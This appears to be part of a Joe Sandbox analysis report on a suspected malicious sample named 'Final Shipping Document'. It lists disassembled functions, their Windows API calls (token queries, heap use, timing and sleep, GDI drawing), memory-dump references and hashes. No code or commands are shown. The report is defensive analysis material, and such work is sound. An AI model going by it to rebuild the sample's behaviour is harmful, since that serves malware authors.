                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                            • String ID:
                                                            • API String ID: 336800556-0
                                                            • Opcode ID: fd62ed036614420884167b1a7b398304484f29d901edd10bc6695f6dbafaa39f
                                                            • Instruction ID: 27f3177a66fd9e799ed9ddb0dda608ee6574f05873afc2a241b42ec464f1b9ae
                                                            • Opcode Fuzzy Hash: fd62ed036614420884167b1a7b398304484f29d901edd10bc6695f6dbafaa39f
                                                            • Instruction Fuzzy Hash: 3A01B5B26012167F23211ABA6C88E7FFEADDEC6BA1315016AF905D7301FA619D01D2B0
                                                            Function 00BB9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BB9693
                                                            • SelectObject.GDI32(?,00000000), ref: 00BB96A2
                                                            • BeginPath.GDI32(?), ref: 00BB96B9
                                                            • SelectObject.GDI32(?,00000000), ref: 00BB96E2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            • Opcode ID: 6b46ee5ee8e38814b88625446d4ea171b6f2bff35baf009191c9e21978c3f8f8
                                                            • Instruction ID: 79a5842555607972d20fb686da37b4763602837cc317032b5fa0776980fc0ad6
                                                            • Opcode Fuzzy Hash: 6b46ee5ee8e38814b88625446d4ea171b6f2bff35baf009191c9e21978c3f8f8
                                                            • Instruction Fuzzy Hash: D2217C31812305EBDB119F28EC59BFD7BF8FB10315F180256FA19A61B0D3B09896DB94
                                                            Function 00C05711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            • Opcode ID: ce82fda6f981ff65146a8f478946912645547da6cf10faaafbac1ef3c25bdec6
                                                            • Instruction ID: b3f04decee49c8a37f3660d3292017046e196b6526a660b5b77cc674082de1dc
                                                            • Opcode Fuzzy Hash: ce82fda6f981ff65146a8f478946912645547da6cf10faaafbac1ef3c25bdec6
                                                            • Instruction Fuzzy Hash: 2C01F9A1695605BBD71855199E42FBB738CDF61398F000438FD14AA2C2F720EE11DAE5
                                                            Function 00BD2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,00BCF2DE,00BD3863,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6), ref: 00BD2DFD
                                                            • _free.LIBCMT ref: 00BD2E32
                                                            • _free.LIBCMT ref: 00BD2E59
                                                            • SetLastError.KERNEL32(00000000,00BA1129), ref: 00BD2E66
                                                            • SetLastError.KERNEL32(00000000,00BA1129), ref: 00BD2E6F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: 74621ca3070b6c75561c403c2d045d9eebb5c6ed6e233f0d975dd98e3b276e72
                                                            • Instruction ID: 042d7b2b7b8e18d2e284a600ca7482dec5145e2e50dbcb03aa9a4cdc2bacd276
                                                            • Opcode Fuzzy Hash: 74621ca3070b6c75561c403c2d045d9eebb5c6ed6e233f0d975dd98e3b276e72
                                                            • Instruction Fuzzy Hash: 1801F9365056806BC61227356CC5F6FA7D9EBF17B272444B7F425A3392FB74CC014120
                                                            Function 00C0000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BFFF41,80070057,?,?,?,00C0035E), ref: 00C0002B
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BFFF41,80070057,?,?), ref: 00C00046
                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BFFF41,80070057,?,?), ref: 00C00054
                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BFFF41,80070057,?), ref: 00C00064
                                                            • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BFFF41,80070057,?,?), ref: 00C00070
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                            • String ID:
                                                            • API String ID: 3897988419-0
                                                            • Opcode ID: c780d680302ca2512a2812fa8c934e8018d2926427f675b5525b185b1dcaaf66
                                                            • Instruction ID: a53521d93af85659b281bd688bc4a33c02a9066162d4fc69551b547d209c459a
                                                            • Opcode Fuzzy Hash: c780d680302ca2512a2812fa8c934e8018d2926427f675b5525b185b1dcaaf66
                                                            • Instruction Fuzzy Hash: 44018F76610204BFDB104F69DC48BAE7BADEB44756F254124F905E2290DB75DE40CBA0
                                                            Function 00C0E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00C0E997
                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 00C0E9A5
                                                            • Sleep.KERNEL32(00000000), ref: 00C0E9AD
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00C0E9B7
                                                            • Sleep.KERNEL32 ref: 00C0E9F3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            • Opcode ID: 347f721c921abe24ec5d61d4173399e29454f26c62a1a93b8e60db7e03e04bf7
                                                            • Instruction ID: 79d3bf0edfff08f95ec5d81f1c48db9c898ad40eaa4d71e67e1223a654f8ecfc
                                                            • Opcode Fuzzy Hash: 347f721c921abe24ec5d61d4173399e29454f26c62a1a93b8e60db7e03e04bf7
                                                            • Instruction Fuzzy Hash: 19011331C41639DBCF00ABE5D999BEEBB78BB09701F000956E912B2291CB309695DBA1
                                                            Function 00C010F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C01114
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01120
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C0112F
                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01136
                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C0114D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 842720411-0
                                                            • Opcode ID: 2aa60dfb7cd5619118decad54cf6b514dd4c29d1802a28982143cf1dacace830
                                                            • Instruction ID: 4ab7c2d21e9c093c37e2c04b44c92b20f66d79885ad9f59bfa6486a756c775a6
                                                            • Opcode Fuzzy Hash: 2aa60dfb7cd5619118decad54cf6b514dd4c29d1802a28982143cf1dacace830
                                                            • Instruction Fuzzy Hash: 7D016975200205BFDB154FA4DC89BAE3B6EEF8A3A0B240418FE41E33A0DA31DD00DB60
                                                            Function 00C00FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C00FCA
                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C00FD6
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C00FE5
                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C00FEC
                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C01002
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 6ef08b5b95c7e850cbbb85c9548eae0e2745691d55a6557d7cca472914b91c1d
                                                            • Instruction ID: 6fc16de846e03cde805c7c5a4a20f5683438ed6d7b7a1aa3142b41a0722f0488
                                                            • Opcode Fuzzy Hash: 6ef08b5b95c7e850cbbb85c9548eae0e2745691d55a6557d7cca472914b91c1d
                                                            • Instruction Fuzzy Hash: BFF04935210301AFDB224FA49C89F5E3BADEF89762F144414FA85E7291CA70DC50CB60
                                                            Function 00C01014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C0102A
                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C01036
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C01045
                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C0104C
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C01062
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: d07dc6278361b13e665314ef1817262e7b538f70ce346c9f1d551fb750f0cf67
                                                            • Instruction ID: 9bb10c7243aa512d7de0f6b5393400eb2cb7044eabc53ec91412224ff92d7d7b
                                                            • Opcode Fuzzy Hash: d07dc6278361b13e665314ef1817262e7b538f70ce346c9f1d551fb750f0cf67
                                                            • Instruction Fuzzy Hash: 3AF06D35210301EBDB215FA4EC89F5E3BADEF89761F140414FE85E7290CA70D950CB60
                                                            Function 00C1030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CloseHandle.KERNEL32(?,?,?,?,00C1017D,?,00C132FC,?,00000001,00BE2592,?), ref: 00C10324
                                                            • CloseHandle.KERNEL32(?,?,?,?,00C1017D,?,00C132FC,?,00000001,00BE2592,?), ref: 00C10331
                                                            • CloseHandle.KERNEL32(?,?,?,?,00C1017D,?,00C132FC,?,00000001,00BE2592,?), ref: 00C1033E
                                                            • CloseHandle.KERNEL32(?,?,?,?,00C1017D,?,00C132FC,?,00000001,00BE2592,?), ref: 00C1034B
                                                            • CloseHandle.KERNEL32(?,?,?,?,00C1017D,?,00C132FC,?,00000001,00BE2592,?), ref: 00C10358
                                                            • CloseHandle.KERNEL32(?,?,?,?,00C1017D,?,00C132FC,?,00000001,00BE2592,?), ref: 00C10365
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: 3be5036fe0d27ba08e8212c364921c635c5f146978900d62afb8883224e62c5c
                                                            • Instruction ID: f2a79699114a262bed80875c0be496ad8c38537cbfa9bedad09905795aea1d84
                                                            • Opcode Fuzzy Hash: 3be5036fe0d27ba08e8212c364921c635c5f146978900d62afb8883224e62c5c
                                                            • Instruction Fuzzy Hash: 5501A272800B15DFC730AF66D880456F7F5BF513153658A3FD1A652931C3B1AA95EF80
                                                            Function 00BDD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00BDD752
                                                              • Part of subcall function 00BD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000), ref: 00BD29DE
                                                              • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                            • _free.LIBCMT ref: 00BDD764
                                                            • _free.LIBCMT ref: 00BDD776
                                                            • _free.LIBCMT ref: 00BDD788
                                                            • _free.LIBCMT ref: 00BDD79A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: a0d34ea2e86ea89843da5053ae422d34617b8700f02ccff5b19f81670924c28e
                                                            • Instruction ID: dd583b9f85c91b76bf32cb8d2907a0944346ba99ca78630409c3dca1873b800e
                                                            • Opcode Fuzzy Hash: a0d34ea2e86ea89843da5053ae422d34617b8700f02ccff5b19f81670924c28e
                                                            • Instruction Fuzzy Hash: 77F04F32544244ABC635EB65F9C1E2ABBDDFB44310B940897F098D7741EB24FC808A64
                                                            Function 00C05C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00C05C58
                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C05C6F
                                                            • MessageBeep.USER32(00000000), ref: 00C05C87
                                                            • KillTimer.USER32(?,0000040A), ref: 00C05CA3
                                                            • EndDialog.USER32(?,00000001), ref: 00C05CBD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: 2869a91a641330aad52fc6cd90150d2c726c83b297cd95b00717aabb0fce7c67
                                                            • Instruction ID: 32c5211d4c7826c2488462d97a487c0c0ae1247fec4ff818820c4292fc45d07e
                                                            • Opcode Fuzzy Hash: 2869a91a641330aad52fc6cd90150d2c726c83b297cd95b00717aabb0fce7c67
                                                            • Instruction Fuzzy Hash: 1C016D31510B04ABFB215B10DE8FFAA7BB8BB04B05F041559B693B10E1DBF4AA84CF90
                                                            Function 00BD22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00BD22BE
                                                              • Part of subcall function 00BD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000), ref: 00BD29DE
                                                              • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                            • _free.LIBCMT ref: 00BD22D0
                                                            • _free.LIBCMT ref: 00BD22E3
                                                            • _free.LIBCMT ref: 00BD22F4
                                                            • _free.LIBCMT ref: 00BD2305
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 4a77340186be8b78ea52316415de3037dd6b02af3268e82473ab879663af4901
                                                            • Instruction ID: 0e4b081c8ef25af41eef942c1a70146cf6975911b0f2204ca6aa2e6cb58a3a3d
                                                            • Opcode Fuzzy Hash: 4a77340186be8b78ea52316415de3037dd6b02af3268e82473ab879663af4901
                                                            • Instruction Fuzzy Hash: 57F030784001908B8722AFA8BC51B1C7BA8F72C7507140597F418D73B2DB740491BBA4
                                                            Function 00BB95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EndPath.GDI32(?), ref: 00BB95D4
                                                            • StrokeAndFillPath.GDI32(?,?,00BF71F7,00000000,?,?,?), ref: 00BB95F0
                                                            • SelectObject.GDI32(?,00000000), ref: 00BB9603
                                                            • DeleteObject.GDI32 ref: 00BB9616
                                                            • StrokePath.GDI32(?), ref: 00BB9631
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                            • String ID:
                                                            • API String ID: 2625713937-0
                                                            • Opcode ID: 44d26e9e9ba133ee68a08c3952953bffe18cd99207cb786331fc2a9fb53e8b28
                                                            • Instruction ID: 89480a73a4c13bc06dd36ec5117fd12057a963acf62198fe68937e1a705efd8a
                                                            • Opcode Fuzzy Hash: 44d26e9e9ba133ee68a08c3952953bffe18cd99207cb786331fc2a9fb53e8b28
                                                            • Instruction Fuzzy Hash: E8F0EC31015744EBDB265F69ED5C7BC3FA5EB11322F088254FA6A650F0C7748996DF20
                                                            Function 00BD0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: __freea$_free
                                                            • String ID: a/p$am/pm
                                                            • API String ID: 3432400110-3206640213
                                                            • Opcode ID: 4cbae685f702dcd777bf8fe74cbf77723c8dcff42a735b6774f67fe39996197f
                                                            • Instruction ID: 8063c240f2e7b9307d505d88005285abffa36cd08963edfe08d026a61576d4e0
                                                            • Opcode Fuzzy Hash: 4cbae685f702dcd777bf8fe74cbf77723c8dcff42a735b6774f67fe39996197f
                                                            • Instruction Fuzzy Hash: 23D1E131900206BADB289F6CC895BBAF7F1EF05710F24499BE505AB751F3359D80CB65
                                                            Function 00C27B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BC0242: EnterCriticalSection.KERNEL32(00C7070C,00C71884,?,?,00BB198B,00C72518,?,?,?,00BA12F9,00000000), ref: 00BC024D
